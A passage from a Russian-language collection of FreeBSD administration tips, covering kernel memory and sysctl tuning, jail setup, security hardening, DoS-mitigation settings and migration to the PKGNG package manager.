системы по формуле: vm.kmem_size = min(max(max(VM_KMEM_SIZE, Physical_memory / VM_KMEM_SIZE_SCALE), VM_KMEM_SIZE_MIN), VM_KMEM_SIZE_MAX) Выглядит жутковато, но суть простая: vm.kmem_size_{min,max} задает диапазон для автонастройки, которая сводится к выбору большего из VM_KMEM_SIZE (это #define) и ОЗУ / vm.kmem_size_scale. Также можно жестко указать vm.kmem_size из loader.conf. Наконец, при любых настройках kmem_size не может быть более двух размеров ОЗУ. Обратите внимание, что kmem -- это участок виртуального адресного пространства, а не физической памяти. Именно поэтому ядро может упасть в панику "kmem_map too small", хотя ОЗУ еще в избытке, если какая-то из подсистем ядра пытается выделить слишком много памяти для своих нужд. Типичный пример этого -- виртуальный диск, созданный с помощью "mdmfs -M".

Кэш TCP запросов во FreeBSD (доп. ссылка 1) Автор: Антон Южанинов [комментарии]

Во FreeBSD 5 был добавлен TCP Hostcache - кэш, в котором сохраняются характеристики удаленных хостов от предыдущих соединений, для предварительной настройки новых подключений к этому же хосту. Это позволяет увеличить скорость работы HTTP (и других протоколов с большим числом котороткоживущих TCP соединений). Иногда бывает полезно посмотреть его содержимое. Увидеть его можно через sysctl net.inet.tcp.hostcache.list Просмотр информации по заданному хосту: sysctl net.inet.tcp.hostcache.list | egrep '(IP|192.168.1.70)' Например если MTU в кеше не равно нулю, то с помощью Path MTU Discovery для данного хоста было определено MTU меньшее чем у данного хоста. Просмотр состояние и параметров hostcache: sysctl net.inet.tcp.hostcache При тестировании производительности бывает нужно очищать этот кэш, между различными итерациями теста, чтоб он не искажал результаты. Сделать это можно так: sysctl net.inet.tcp.hostcache.purge=1 Потом подождать до тех пор, пока net.inet.tcp.hostcache.purge снова не будет показывать ноль.

Работа процессов размером более 512Мб во FreeBSD Автор: MicRO [комментарии]

Во FreeBSD 6.2 с 4Гб ОЗУ, процесс python'a виснет когда занимает более 512Мб. Решение: В /boot/loader.conf добавляем kern.maxdsiz="2610612736" kern.dfldsiz="2610612736" kern.maxssiz="2610612736" После чего процесс начинает работать в штатном режиме.

Как избавится от роста висящих FIN_WAIT_2 соединений под FreeBSD [комментарии]

Если используется ipfw2 и keep-state правила, то от непрерывного роста соединений со статусом FIN_WAIT_2 помогает: sysctl -w net.inet.ip.fw.dyn_keepalive=0

Как увеличить производительность memcached под FreeBSD (доп. ссылка 1) Автор: fak3r [комментарии]

Под FreeBSD наблюдаются проблемы производительности при работе memcached с объектами размером больше чем несколько килобайт. Переходим в порт memcached cd /usr/ports/databases/memcached/ make configure Редактируем файл memcached.c vi work/memcached-1.1.12/memcached.c Находим строку #include "memcached.h" и после нее прописываем TCPNOPUSH (заставляет использовать TCPNODELAY): #undef TCP_NOPUSH Устанавливаем и запускаем: make install echo "memcached_enable=\"YES\"" >> /etc/rc.conf /usr/local/etc/rc.d/memcached.sh start

Некоторые полезные sysctl переменные для FreeBSD (доп. ссылка 1) [комментарии]

security.bsd.* - управление моделью безопасности

security.bsd.see_other_uids, security.bsd.see_other_gids - если 1, то пользователи (группы) могут видеть чужие процессы, сокеты и т.д. через ps, netstat, procfs;
security.bsd.conservative_signals - если 1, то некоторые сигналы запрещается посылать setuid/setgid процессам;
security.bsd.unprivileged_proc_debug - если 1, то пользовательский процесс можно отлаживать через ptrace, procfs, ktrace и т.д..
security.bsd.unprivileged_read_msgbuf - если 1, то пользовательский процесс может читать из системного консольного буфера сообщений;
security.bsd.hardlink_check_uid, security.bsd.hardlink_check_gid - если 1, то пользователи могут делать hardlink только на собственные файлы;
security.bsd.unprivileged_get_quota - если 1, пользователи могут просматривать информацию по установленным для них квотам.
vfs.usermount - если 1, то непривилегированный пользователь может монтировать и размонтировать FS, если для устройства выставлены "rw" права и пользователь является владельцем точки монтирования;

security.jail.* - ограничения для jail

security.jail.set_hostname_allowed - если 1, то внутри jail можно поменять имя хоста;
security.jail.socket_unixiproute_only - если 1 , то сокет в jail можно создать только для доменов PF_LOCAL, PF_INET или PF_ROUTE, иначе, возвращается ошибка;
security.jail.sysvipc_allowed - если 1, то то в jail можно получить доступ к глобальному System V IPC;
security.jail.getfsstatroot_only - если 1, то в jail можно получить информацию (df)только о той файловой системе на которой создан jail;
security.jail.allow_raw_sockets - если 1, то в jail можно создавать raw sockets;
security.jail.chflags_allow - если 1, то процессы в jail могут модифицировать флаги ФС.

IPFW

net.link.ether.bridge_ipfw - если 1 и ядро собрано с опциями IPFIREWALL и BRIDGE, то позволяет использовать ipfw для трафика внутри бриджа;
net.link.ether.ipfw - если 1, то ipfw2 позволяет фильтровать по MAC адресам;
net.inet.ip.fw.autoinc_step - задается число на которое увеличивается счетчик при добавления нового ipfw правила, когда явно не указан его номер;
net.inet.ip.fw.debug - если 1, то в логи помещается дополнительная отладочная информация по работе ipfw;
net.inet.ip.fw.verbose - если 0, то не отображать работу "log" правил в syslog;
net.inet.ip.fw.one_pass - если 1, то просмотр правил ipfw прекращается сразу после подпадание под queue или pipe правило. Если 0, то продолжается обработка далее идущих правил;

ICMP, соединение.

net.inet.icmp.icmplim - задается максимальное число ICMP "Unreachable" и TCP RST пакетов, которое может быть отправлено в секунду, net.inet.icmp.icmplim_output=0 позволяет не отражать в логах факты превышения лимита;
net.inet.tcp.icmp_may_rst, если 1, то TCP соединения со статусом SYN_SENT, могут быть оборваны посредством сообщения "ICMP unreachable";
net.inet.ip.redirect - если 0, то нет реакции на ICMP REDIRECT пакеты;
net.inet.icmp.log_redirect - если 1, то все ICMP REDIRECT пакеты отражаются в логе;
net.inet.icmp.drop_redirect - если 1, то ICMP REDIRECT пакеты игнорируются;
net.inet.tcp.icmp_may_rst - если 1, то игнорируются ICMP сообщения от блокировки пакета по пути;
net.inet.icmp.bmcastecho - для защиты от SMURF атак (ICMP echo request на broadcast адрес) нудно поставить 0;

Тюнинг сетевой подсистемы, борьба с DoS атаками

net.inet.tcp.log_in_vain, net.inet.udp.log_in_vain - если 1, отражаем в логе попытки соединения к портам, для которых нет активных сервисов;
net.inet.tcp.blackhole - если 1, то SYN пакеты пришедшие на порты для которых нет активных сервисов, остаются без RST ответа, если 2, то на любые пакеты нет ответа (затрудняет сканирования портов);
kern.ipc.nmbclusters - если по "netstat -m" mbufs в "peak" приближается к "max", то число сетевых буферов нужно увеличить (kern.ipc.nmbclusters=N в /boot/locader.conf);
net.inet.ip.forwarding - если 1, то машина может форвадить пакеты между интерфейсами;
net.inet.tcp.sack.enable - если 1, то включен TCP Selective Acknowledgements (SACK, RFC 2018) позволяющий увеличить производительность системы в ситуации большой потери пакетов;
net.link.ether.inet.max_age - время жизни записи в IP route кэше, рекомендуется уменьшить для ослабления эффекта от DoS атак через ARP флуд;

Оборудование и системная информация

dev.cpu.0.freq_levels - выдает список поддерживаемых частот, на которые можно переключить CPU, путем указание нужной частоты через dev.cpu.0.freq;
hw.snd.maxautovchans, hw.snd.pcm0.vchans - задается число виртуальных звуковых каналов, для каждого из которых может быть отдельный источник звука (на выходе они будут смикшированы);
kern.boottime - время последней загрузки системы;
kern.disks - список дисков в системе;
kern.geom.debugflags, для работы boot0cfg и подобных утилит нужно установить в 16;

Изменение и тюнинг системных ограничений

kern.coredump - если 0, то при крахе приложения не будут создаваться core файлы, формат имени и путь для которых задается через kern.corefile (например: /tmp/%U.%N.core). kern.sugid_coredump=0 позволяет запретить генерацию core suid/sgid процессами;
kern.maxfiles - максимально допустимое число открытых файлов (файловых дескрипторов), текущее число открытых файлов можно посмотреть через kern.openfiles;
kern.maxprocperuid - максимально допустимое число процессов, которое может быть запущено из-под одного пользователя;
kern.maxvnodes - максимальное число vnode для кеширования дисковых операций, текущее значение можно посмотреть через vfs.numvnodes или debug.numvnodes/debug.freevnodes;

SMP (FreeBSD 5)

kern.smp.maxcpus (machdep.smp_cpus) - максимальное число процессоров, поддерживаемое текущей сборкой ядра;
kern.smp.active, kern.smp.disabled - число активных и выключенных CPU;
kern.smp.cpus (machdep.smp_active) - сколько CPU в online;
kern.smp.forward_signal_enabled - включить возможность мгновенной пересылки сигнала для процессов выполняемых в данный момент времени на разных CPU;
kern.smp.forward_roundrobin_enabled;

ARP

net.link.ether.inet.log_arp_movements - отражать в логе все широковещательные ARP пакеты с хостов MAC адрес которых отсутствует в локальном ARP кэше;
net.link.ether.inet.log_arp_wrong_iface - отражать в логе все ARP пакеты пришедшие с неправильного интерфейса;

Включение Device Polling в FreeBSD (доп. ссылка 1) [комментарии]

man polling - периодических опрос состояния ядром, вместо генерации прерываний (полезно при очень большом числе пакетов проходящих через сетевую карту), возможен комбинированный вариант, когда polling включается при преодалении определенного порога нагрузки). В конфигурации ядра options DEVICE_POLLING options HZ=1000 Далее: sysctl kern.polling.enable=1 sysctl kern.polling.user_frac=50

Как оценить величину трафика и состояние системы в динамике для FreeBSD [комментарии]

Динамика изменения параметров: netstat -w 1 iostat -w 1 vmstat -w 1 gstat Состояние буферов: vmstat -z netstat -m netstat -Lan netstat -s -p tcp

Как под FreeBSD создать файловую систему в памяти (ramdisk) [комментарии]

man mount_mfs mount_mfs -s 614400 /dev/amrd0s1b /usr/obj где /dev/amrd0s1b - swap раздел, 614400 - размер MFS диска N*1024*2 (614400 == 300mb).

Что изменить в настройках конфигурации ядра FreeBSD для нагруженного сервера. [комментарии]

maxusers 512 options NMBCLUSTERS=16786 options NBUF=2048 options CHILD_MAX=512 options OPEN_MAX=512 options "MAXDSIZ=(512*1024*1024)" options "DFLDSIZ=(128*1024*1024)" options IPFIREWALL options IPFIREWALL_FORWARD options IPFIREWALL_DEFAULT_TO_ACCEPT options SOFTUPDATES

Как в FreeBSD посмотреть состояние системных буферов [обсудить]

sysctl vm.zone

Как включить Soft-updates в FreeBSD для увеличения производительности [комментарии]

1. Перейти в single режим 2. Убедится, что раздел диска размонтирован. 3. tunefs -n enable раздел (например, tunefs -n enable /usr )

Как в FreeBSD узнать значения LoadAverage, объем свободного ОЗУ и т.д. [комментарии]

sysctl vm.stats.vm.v_active_count sysctl vm.stats.vm.v_inactive_count sysctl vm.stats.vm.v_wire_count sysctl vm.stats.vm.v_cache_count sysctl vm.stats.vm.v_free_count sysctl vm.stats.vm.v_page_count более подробно: sysctl -a|grep vm sysctl| less

Как узнать аппаратную конфигурацию (ОЗУ, CPU и т.д.) машины под FreeBSD [комментарии]

sysctl -a | grep hw

Как увеличить производительность дисковой подсистемы FreeBSD. [комментарии]

По умолчанию запись на диски в FreeBSD производится в синхронном режиме, значительно увеличить скорость записи можно активировав асинхронный режим: В /etc/fstab в поле Options добавить async (например rw,async). Или для примонтированного раздела: mount -u -o async /home Для увеличения производительности IDE дисков, в файле конфигурации ядра можно указать для wdc устройств flags 0xa0ffa0ff или 0x80ff80ff (подробнее man wd, man ad). Для ad: sysctl hw.atamodes; sysctl hw.ata Например: sysctl hw.atamodes=pio,pio,---,dma,pio,---,dma,---, См. также man atacontrol Третий вариант - активировать в настройках ядра SOFTUPDATES и запустить tunefs -n enable /usr в single-user на размонтированном разделе.

Как увеличить количество shared memory для работы высоконагруженного PostgreSQL [комментарии]

В linux: echo 134217728 >/proc/sys/kernel/shmall echo 134217728 >/proc/sys/kernel/shmmax В конфиге ядра FreeBSD: options SYSVSHM options SHMMAXPGS=4096 options SHMMAX="(SHMMAXPGS*PAGE_SIZE+1)" options SHMMIN=2 options SHMMNI=256 options SHMSEG=256 options SYSVSEM options SEMMAP=512 options SEMMNI=512 options SEMMNS=1024 options SEMMNU=512 options SEMMSL=256 options SEMOPM=256 options SEMUME=64 options SYSVMSG options MSGMNB=8192 options MSGMNI=256 options MSGSEG=8192 options MSGSSZ=16 options MSGTQL=128 options NMBCLUSTERS=16786 options NBUF=2048 maxusers 512

Решение проблемы при отказе работы Skype за шлюзом с изменённым TCP MSL Автор: Крепышик [комментарии]

Есть несколько офисов, выходящих в интернет через шлюз с FreeBSD + ipfw + ipnat. После тюнинга сетевой подсистемы шлюза перестал работать скайп во вне. С внутриофисными контактами связь работала видимо потому что скайп соединяется напрямую с ними. В результате поиска причины - выяснилось что виной тому была переменная sysctl: net.inet.tcp.msl=5000 время которое соединение может пребывать в состоянии TIME_WAIT. (T = msl*2/1000 секунд) После возврата на исходное значение 30000 (T=60 сек.) Skype снова заработал.

Что имеет смысл поменять через sysctl в FreeBSD [комментарии]

/sbin/sysctl -w net.inet.ip.forwarding=0 /sbin/sysctl -w net.inet.tcp.always_keepalive=1 /sbin/sysctl -w kern.ipc.somaxconn=1024 /sbin/sysctl -w net.inet.tcp.delayed_ack=0 /sbin/sysctl -w net.inet.ip.portrange.last=30000 /sbin/sysctl -w net.inet.tcp.sendspace=131072 # подогнать размер под средний объем блока передаваемых данных. 131072 - для отдачи больших файлов. /sbin/sysctl -w net.inet.tcp.recvspace=131072 # подогнать размер под средний объем блока принимаемых данных. 131072 - для приема больших файлов. #/sbin/sysctl -w net.inet.tcp.rfc1644=1 #/sbin/sysctl -w net.inet.tcp.rfc1323=0 #/sbin/sysctl -w net.inet.icmp.drop_redirect=1 #/sbin/sysctl -w net.inet.icmp.log_redirect=1 #/sbin/sysctl -w net.inet.ip.redirect=0 #/sbin/sysctl -w net.inet6.ip6.redirect=0 /sbin/sysctl -w net.link.ether.inet.max_age=1200 /sbin/sysctl -w net.inet.ip.sourceroute=0 /sbin/sysctl -w net.inet.ip.accept_sourceroute=0 /sbin/sysctl -w net.inet.icmp.bmcastecho=0 /sbin/sysctl -w net.inet.icmp.maskrepl=0

Увеличение безопасности FreeBSD

Быстрое создание jail-машины во FreeBSD (доп. ссылка 1) Автор: mr-tacitus [комментарии]

Нам понадобится первый установочный диск FreeBSD 6.2 и немного свободного времени. Предполагается что наша jail-машина будет размещена в директории /var/jail. Список действий: 1. Создать директорию /var/jail/machine для jail-машины; 2. Смонтировать установочный диск и распаковать базовые файлы в директорию jail-машины: # mount /cdrom для bash: # DESTDIR=/var/jail/machine /cdrom/6.2-RELEASE/base/install.sh для csh: # env DESTDIR=/var/jail/machine /cdrom/6.2-RELEASE/base/install.sh 3. Создать пустой файл /var/jail/machine/etc/fstab: # touch /var/jail/machine/etc/fstab 4. Создать файл /var/jail/machine/etc/rc.conf со следующим содержанием: # Запускаем sshd sshd_enable="YES" sendmail_enable="NONE" syslogd_flags="-ss" rpcbind_enable="NO" network_interfaces="" 5. Теперь требуется создать непривилегированного пользователя и изменить пароль пользователя root. Входим в каталог jail-машины # chroot /var/jail/machine /bin/csh Создаем пользователя # adduser Меняем пароль пользователя root # passwd # exit 6. В файл /etc/rc.conf основной системы добавить: # Разрешаем запуск jail-машин jail_enable="YES" # Запрещаем им менять свое имя jail_set_hostname_allow="NO" # Перечисляем jail-машины в системе. jail_list="machine" # Jail-машина "machine" # Корневая директория jail_machine_rootdir="/var/jail/machine" # Имя jail_machine_hostname="machine.local" # IP-адрес jail_machine_ip="192.168.0.10" # На какой сетевой интерфейс будет цепляться jail-машина jail_machine_interface="ed0" # монтируем файловую систему devfs внутри jail-машины. jail_machine_devfs_enable="YES" # Скрипты запуска и останова jail_machine_exec_start="/bin/sh /etc/rc" jail_machine_exec_stop="/bin/sh /etc/rc.shutdown" 7. Кроме того требуется все запускаемые сервисы основной системы привязать к его ip-адресам (не должны слушаться порты на ip-адресах jail-машин). Например, в rc.conf: # Супер-сервер inetd inetd_enable="YES" # Слушает порт только на 192.168.0.1 inetd_flags="-wW -a 192.168.0.1" # Syslogd syslogd_enable="YES" # Не слушать порты syslogd_flags="-ss" 8. Запускаем созданную jail-машину: # /etc/rc.d/jail start

Использование login.access в FreeBSD 5.x и 6.x Автор: 135all [обсудить]

В FreBSD есть прекрасная возможность разрешать логинится конкретным пользователям только с определённых терминалов или адресов. Делается это посредством модуля pam_acct_mgmt. Для этого редактируем файл /etc/login.access: -:root:ALL #запрещаем любые логины root -:ALL:ttyv0 # первая консоль только для логов +:dm:ttyv1 ttyv2 ttyv3 ttyv4 ttyv5 ttyv6 ttyv7 ttyv8 # доступ с консоли +:dm:10.1.1.1 192.168.6.100 # доступ по сети(тут указывать либо ip, либо # доменное имя. Для ssh рекомендую UseDNS no в /etc/ssh/sshd_config) -:ALL:ALL # всё остальное запрещено ВАЖНО! начиная с версии 5.2 su стал проверять "target user" по login.access, те при таких настройках можно будет залогинится, но su не будет работать - pam_login_access: pam_sm_acct_mgmt: root is not allowed to log in on /dev/ttyp3 su: Sorry. Для исправления надо редактировать /etc/pam.d/su: account #account include system #закомментировать account required pam_unix.so # добавить

Шифрованный swap в FreeBSD 6.0 Автор: neozoid [комментарии]

Добавить в /boot/loader.conf: geom_eli_load="YES" или в конфиг ядра: device crypto options GEOM_ELI в fstab к разделу swap к "Device" дописать ".eli" например: # Device Mountpoint FStype Options Dump Pass# #/dev/ad0s3b none swap sw 0 0 /dev/ad0s3b.eli none swap sw 0 0 при загрузке имеем: GEOM_ELI: Device ad0s3b.eli created. GEOM_ELI: Cipher: AES GEOM_ELI: Key length: 256 GEOM_ELI: Crypto: software и в моем случае: %pstat -s Device 1K-blocks Used Avail Capacity /dev/ad0s3b.eli 1048576 0 1048576 0%

Как запретить создание символических линков в /tmp [комментарии]

FreeBSD: В графе "Option" /etc/fstab для раздела /tmp нужно указать: rw,noexec,nosuid,nodev,nosymfollow Для Linux: Openwall patch (http://openwall.com/) + CONFIG_SECURE_LINK + chmod +t /tmp

Как в FreeBSD включить Blowfish шифрование паролей вместо DES и MD5 [комментарии]

В /etc/login.conf: :passwd_format=blf:\ cap_mkdb /etc/login.conf

Как в FreeBSD запретить свободный вход как root с консоли через boot -s [обсудить]

В /etc/ttys поменяйте secure на insecure в строке: console none unknown off secure

Предотвращение DoS атак в FreeBSD (доп. ссылка 1) Автор: bsdportal.ru [комментарии]

* "sysctl -w net.inet.tcp.msl=7500" - время ожидания ACK в ответ на SYN-ACK или FIN-ACK в миллисекундах; * "sysctl -w net.inet.tcp.blackhole=2" - все пакеты на закрытый порт отбрасываются без отсылки RST; * "sysctl -w net.inet.udp.blackhole=1" - отбрасывать пакеты для закрытых портов; * "sysctl -w net.inet.icmp.icmplim=50" - защита от генерирование потока ответных пакетов, максимальное количество ICMP Unreachable и TCP RST пакетов в секунду; * "sysctl -w kern.ipc.somaxconn=32768" - увеличение числа одновременно открытых сокетов; * Сборка ядра с опцией DEVICE_POLLING (далее: sysctl kern.polling.enable=1; sysctl kern.polling.user_frac=50);

Установка и апгрейд FreeBSD и приложений.

Решение проблемы при установке FreeBSD на HP (Compaq) ProLiant DL360 Автор: else [комментарии]

При установке ОС с диска во время определения дисков появляется ошибка "BTX halted". Для ее устранения нужно отключить в BIOS опцию Virtual install disk.

Режим автоматической установки обновлений в portmaster Автор: globus [комментарии]

При обновлении php на нескольких десятках серверов возникла проблема с ручным подтверждением операций. Обновление PHP потянуло за собой по 28-40 обновлений/новых пакетов. В процессе обновления Portmaster постоянно спрашивает, удалять резервную копию предыдущего пакета или нет. Переключение по окнам между десятками серверов и нажатие кнопок n+enter существенно затормаживало процесс и изрядно выводило из себя. Вот пример команды с параметрами, которые позволяют автоматизировать процесс обновления: portmaster --no-confirm -y -b -d php pecl Само собой, "-y" или "-n" выбирает каждый для себя.

Использование пакетного менеджера PKGNG во FreeBSD (доп. ссылка 1) Автор: lavr [комментарии]

Не секрет что отсутствие в OS FreeBSD современного пакетного менеджера тормозит и сдерживает не только систему работы с портами, но и развитие системы в целом. Несомненно старый пакетный менеджер, написанный на СИ Джорданом Хаббардом, был революционным шагом в начале 90'ых, легкий, быстрый, надежный и простой. Но современные условия выдвигают новые требования, что и послужило толчком для создания нового пакетного менеджера и дабы прекратить споры и разногласия среди разработчиков и сообщества FreeBSD, которые ведутся на протяжении, примерно 10 лет или больше. Если кто-то решит что за это время можно было разработать несколько пакетных менеджеров, удовлетворяющих современным требованиям и тенденциям, возможно, но в рамках концепции развития проекта FreeBSD это, к сожалению, не так. прим: данное описание не претендует на серьезное руководство и может содержать повторы, точнее выжимки ранее изложенного в стиле "коротко" Суть - показать на примерах как лучше и удобней пользоваться новым пакетным менеджером PKGNG. Коротко о достижения пакетного менеджера PKGNG: - использование db для регистрации и хранения данных об установленных пакетах (sqlite) - использование одного или нескольких репозиториев - использование yaml для описания пакета - интерфейс для сторонних порт менеджеров - создание backup и отката - аудит - и тд и тп Ссылки: - http://wiki.freebsd.org/pkgng - http://wiki.freebsd.org/PkgPrimer - https://github.com/pkgng/pkgng/blob/master/FAQ.md - http://people.freebsd.org/~bapt/pres-pkgng-bsdcan.pdf - http://www.youtube.com/watch?v=4Hxq7AHZ27I - http://wiki.freebsd.org/pkgng - http://wiki.freebsd.org/PkgPrimer - https://github.com/pkgng/pkgng/blob/master/FAQ.md - http://people.freebsd.org/~bapt/pres-pkgng-bsdcan.pdf - http://www.youtube.com/watch?v=4Hxq7AHZ27I Сообщить об ошибках можно на github трекер: - http://github.com/pkgng/pkgng Третичный софт поддерживающий работу с новым пакетным менеджером pkgng: "из коробки": - ports-mgmt/portupgrade-devel (soon the main portupgrade will support) - ports-mgmt/pkg_cutleaves - ports-mgmt/poudriere - ports-mgmt/poudriere-devel - ports-mgmt/portdowngrade - ports-mgmt/tinderbox-devel (support can be improved) - ports-mgmt/portbuilder - sysutils/bsdstats используя патчи: - ports-mgmt/portmaster https://github.com/pkgng/pkgng/blob/master/ports/patch-portmaster-pkgng инструментарий который будет или уже поддерживает работу с pkgng: - salt support (in version 0.10) http://docs.saltstack.org/en/latest/ref/states/all/salt.states.pkgng.html и http://docs.saltstack.org/en/latest/ref/modules/all/salt.modules.pkgng.html - cfengine support (http://unix-heaven.org/cfengine3-freebsd-pkgng) - puppet support: (https://github.com/xaque208/puppet-pkgng) - ruby bindings: (https://github.com/baloo/libpkg-ruby/) - PackageKit В системе, начиная с 9.1 находится пусковик /usr/sbin/pkg - который смотрит переменные PACKAGESITE,PACKAGEROOT и использует их для задания репозитория и запускает УСТАНОВКУ pkg (Bootsrapping) из портов. Если переменные не определены, использует заданные в pkg.conf или встренные в пусковик (/usr/src/usr.sbin/pkg/pkg.c): #define _LOCALBASE "/usr/local" #define _PKGS_URL "http://pkgbeta.FreeBSD.org" $PACKAGESITE/Latest/pkg.txz или $PACKAGEROOT/latest/Latest/pkg.txz или (pkg.conf) packagesite: http://pkgbeta.FreeBSD.org/freebsd:9:x86:64/latest /usr/ports/ports-mgmt/pkg для использования пакетного менеджера pkg, после его установки, необходимо добавить переменную WITH_PKGNG=yes в /etc/make.conf. Необходимо напомнить еще одно важное событие - изменение опций сборки в портах, точнее, создание нового фреймворка для портов - OPTIONSNG. скрипт: /usr/ports/Tools/scripts/options2ng.sh - создает backup OPTIONS базы портов (/var/db/ports) и конвертирует их в новый формат например: сконвертировать отдельный файл: # /usr/ports/Tools/scripts/options2ng.sh -f /tmp/make.conf создать /tmp/optionsbackup.tar.gz и сконфертировать все OPTIONS в /var/db/port*/options в новый формат: # /usr/ports/Tools/scripts/options2ng.sh -p Вы можете пропустить короткое описание фреймворка OPTIONSNG Немного о framework OPTIONSNG файл KNOB в портах - устаревшая технология, которая заменена на bsd.options.desc.mk. Ниже будет, возможно устаревшая информация основанная на материалах конференций: новый framework для указания опций сборок портов: OptionsNG Framework http://people.freebsd.org/~bapt/optionsng.pdf (eurobsd conf 2011) http://people.freebsd.org/~bapt/pres-optionng.pdf (bsdcon 2012) актуальную информацию можно найти: http://wiki.freebsd.org/Ports/Options/OptionsNG http://www.freebsd.org/doc/en_US.ISO8859-1/books/porters-handbook/makefile-options.html#AEN2598 текущие проблемы и несовместимость: - на текущий момент в опциях могут быть только две переменные WITH_FOO и WITHOUT_FOO - их значения не проверяются - несовместимость использования предложение: - простые опции (on или off) - сложные опции: по крайней мере 1 для N - простые: 1 и только 1 опция для N (исключительно) - каждая опция может иметь описание - опции maintainer'ов - системные опции - OPTIONS_DEFINE: port, maintainer - OPTIONS_DEFAULT: port, maintainer - OPTIONS_EXCLUDE: port, maintainer - OPTIONS_OVERRIDE: break everything - OPTIONS_SET= OPT1: user, make.conf - OPTIONS_UNSET= OPT1: user, make.conf - ${UNIQUENAME}_SET= OPT1 (zsh_SET) user, make.conf - ${UNIQUENAME}_UNSET= OPT1 (zsh_SET) user, make.conf - generic options desciptions - как это сейчас сделано в файле KNOBS совместимость 1/ set the default global options 2/ removes any global via OPTIONS_EXCLUDE 3/ OPTIONS_DEFAULT: override previous 4/ system-wide OPTIONS_(UN)SET 5/ ${UNIQUENAME:U}_(UN)SET 6/ compatibility: /var/db/ports/${UNIQUENAME}/options (note: usage of OPTIONS+= is deprecated) 6/ new /var/db/ports/${UNIQUENAME}/options from dialog ui 7/ automatic consistency check пример: OPTIONS_DEFINE= OPT1 OPT2 OPT3 OPTIONS_MULTI= GRP1 GRP2 OPTIONS_MULTI_GRP1= OPT4 OPT5 OPTIONS_MULTI_GRP2= OPT6 OPT7 OPTIONS_SINGLE= SEL1 OPTIONS_SINGLE_SEL1= OPT8 OPT9 OPT10 OPTIONS_DEFAULT= OPT2 OPT3 OPT9 OPT7 OPT8 OPT4 OPTIONS_EXCLUDE= NLS DOCS OPT1_DESC= "Description of my option" # make show-config ===> The following configuration options are available: OPT1=off: Description of my option OPT2=on OPT3=on ====> Options available for the MULTI GRP1: you must choose at least one of them OPT4=on OPT5=off ====> Options available for the MULTI GRP2: you must choose at least one of them OPT6=off OPT7=on ====> Options available for the single SEL1: you must select only on of them OPT8=on OPT9=off OPT10=off # make pretty-print-config: -OPT1 +OPT2 +OPT3 GRP1[ +OPT4 -OPT5 ] GRP2[ -OPT6 +OPT7 ] \\ SEL1( +OPT8 +OPT9 -OPT10 ) # make check-config ====> You should select one and only one options from the \\ SEL1 single *** Error code 1 проверка опций в портах: .if !empty(PORTS_OPTIONS:MOPT1) @${ECHO_CMD} "the option OPT1 is set (aka on)" .else @${ECHO_CMD} "the option OPT1 is not set (aka off)" .endif Продолжение о пакетном менеджере PKGNG Итак, после установки пакетного менеджера PKGNG в систему, чтобы перейти на его использование, необходимо добавить в /etc/make.conf: WITH_PKGNG=yes пример вызова пусковика, который предлагает установку pkg из портов: # pkg -v The package management tool is not yet installed on your system. Do you want to fetch and install it now? [y/N]: y Bootstrapping pkg please wait Installing pkg-1.0.r5_1... done If you are upgrading from the old package format, first run: $ pkg2ng 1.0-rc5 # после установки из портов /usr/ports/ports-mgmt/pkg в систему и соответствующих настроек в /etc/make.conf, если у нас в /var/db/pkg уже находятся ранее установленные пакеты в старом формате pkg_add, необходимо: 1) лучше руками сделать backup /var/db/pkg 2) запустить pkg2ng - утилита сделает backup /var/db/pkg.bak и сконвертит ранее установленные пакеты в новом формате pkgng: # ls -la /var/db/pkg/ total 84320 drwxr-xr-x 2 root wheel 512 Sep 1 21:56 . drwxr-xr-x 8 root wheel 512 Sep 1 20:16 .. -rw-r--r-- 1 root wheel 120832 Sep 1 21:56 local.sqlite -rw-r--r-- 1 root wheel 86149120 Sep 1 20:20 repo.sqlite # в июле 2012 порты перевели на новый Framework OPTIONSGS, утилита pkg-config была заменена на pkg-conf, всвязи с этими изменениями необходимо: - после апгрейда портов (/usr/ports), посмотреть внимательно /usr/ports/UPDATING (это нужно делать регулярно при апгрейде дерева портов) заменить pkg-cconfig на pkgconf: # portmaster -o devel/pkgconf devel/pkg-config или # pkg set -o devel/pkg-config:devel/pkgconf # pkg install -f devel/pkgconf или # pkg_delete -f pkg-config* # cd /usr/ports/devel/pkgconf # make install clean - для перехода на новые порты с новым Framework OPTIONSGS, перевести флаги в /etc/make.conf для сборки портов и options в новый формат: # /usr/ports/Tools/scripts/options2ng.sh -p (для конвертации /var/db/ports/name/options в новый формат) # /usr/ports/Tools/scripts/options2ng.sh -f /etc/make.conf # /usr/ports/Tools/scripts/options2ng.sh -f /usr/local/etc/ports.conf (если используем универсальный порт portsconf -> ports.conf его так же конвертируем в optionsng) если используем portmaster и планируем использовать его с pkgng, необходимо обновить до portmaster-3.13.13 с применением патча: # wget -Y off -t 0 -c --no-check-certificate https://raw.github.com/pkgng/pkgng/ master/ports/patch-portmaster-pkgng # cp patch-portmaster-pkgng /usr/ports/ports-mgmt/portmaster/files # make -C /usr/ports/ports-mgmt/portmaster clean deinstall reinstall патч можно наложить прямо на уже установленную версию portmaster-3.13.13 коротко: - первый запуск /usr/sbin/pkg (установит из портов /usr/ports/ports-mgmt/pkg) # pkg - создать ручной backup /var/db/pkg (старого формата pkg_add) # cp -R /var/db/pkg /var/tmp/pkg - запустить конвертацию старого формата packages в новый # pkg2ng получим backup старого /var/db/pkg -> /var/db/pkg.bak и новые базы sqlite для каждого репозитория в формате pkg: - local.sqlite (локально установленные пакеты через pkg) - repo.sqlite (содержимое удаленного репозитория) pkg FAQ (portmaster): https://github.com/pkgng/pkgng/blob/master/FAQ.md до преобразования pkg2ng, выполнить: # portmaster -L (покажет установленные пакеты) после преобразования старой базы в базу pkg: # portmaster -L (покажет отсутствие пакетов) Если мы используем portmaster, необходимо его пропатчить для использования с pkg: # wget -Y off -t 0 -c --no-check-certificate https://raw.github.com/pkgng/pkgng/master/ports/patch-portmaster-pkgng # cp patch-portmaster-pkgng /usr/ports/ports-mgmt/portmaster/files # make -C /usr/ports/ports-mgmt/portmaster clean deinstall reinstall # echo "WITH_PKGNG=yes" >> /etc/make.conf проверка работы portmaster совместно с pkg: # portmaster -L (должен прочитать локальную базу pkg) Первичные настройки pkg: настройки в файле /usr/local/etc/pkg.conf, аналогичные переменные в среде перекроют настройки pkg.conf на момент выполнения: ASSUME_ALWAYS_YES : [NO|YES] PACKAGESITE : http://pkg.freebsd.org/${ABI}/latest (сайт репозитория) PKG_MULTIREPOS : [NO|YES] (использовать несколько репозиториев) by default: PKG_DBDIR = /var/db/pkg PKG_CACHEDIR = /var/cache/pkg репозитории задаются в pkg.conf # Repository definitions #repos: # default : http://example.org/pkgng/ # repo1 : 